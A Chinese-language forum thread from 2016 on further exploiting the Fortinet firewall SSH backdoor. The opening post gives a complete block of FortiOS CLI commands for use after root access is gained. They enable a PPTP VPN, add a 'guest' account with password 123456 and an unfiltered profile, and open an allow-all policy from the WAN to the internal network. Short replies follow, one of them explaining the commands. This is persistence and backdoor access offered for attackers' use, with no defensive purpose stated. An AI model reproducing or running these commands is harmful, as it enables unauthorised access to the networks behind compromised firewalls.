tx1 发表于 2016-1-15 17:44:54

飞塔SSH后门 进一步利用方法

最近这个漏洞很火啊!
:lol

因为这个漏洞获取到的直接就是防火墙的root权限。所以我们给自己开个vpn然后你想干啥就干啥呗。还不懂?去翻用户手册。

查看用户组
show user group
开启vpn代码。
config vpn pptp
set status enable
set eip 192.168.200.100
set sip 192.168.200.1
set usrgrp Guest-group
end
config user local
edit "guest"
set type password
set passwd 123456
next
end
config user group
edit "Guest-group"
set profile "unfiltered"
set member "guest"
next
end
config firewall policy
edit 9
set srcintf "wan1"
set dstintf "internal"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
next
end

LangDao 发表于 2016-1-15 19:27:15

666666   

tx1 发表于 2016-1-15 23:46:46

LangDao 发表于 2016-1-15 19:27 static/image/common/back.gif
666666

没意思,分享东西都没人看,以后不分享了

Antergone 发表于 2016-1-16 00:03:10

额其实有人看,为了尊重劳动成果,建议还是带上VIA

tx1 发表于 2016-1-16 01:16:22

Antergone 发表于 2016-1-16 00:03 static/image/common/back.gif
额其实有人看,为了尊重劳动成果,建议还是带上VIA

via   啥玩意

tx1 发表于 2016-1-16 01:16:59

Antergone 发表于 2016-1-16 00:03 static/image/common/back.gif
额其实有人看,为了尊重劳动成果,建议还是带上VIA

主要是没人出来讨论

细草微风岸 发表于 2016-1-16 07:41:36

看不懂;P

Antergone 发表于 2016-1-16 11:13:03

tx1 发表于 2016-1-16 01:16
主要是没人出来讨论

其实很简单,就是通过remote连接之后,在上面执行cli命令就好了。
你在上面列出来的都是命令啊   就类似你在linux的terminal 执行 adduser addgroup一样
页: [1]
查看完整版本: 飞塔SSH后门 进一步利用方法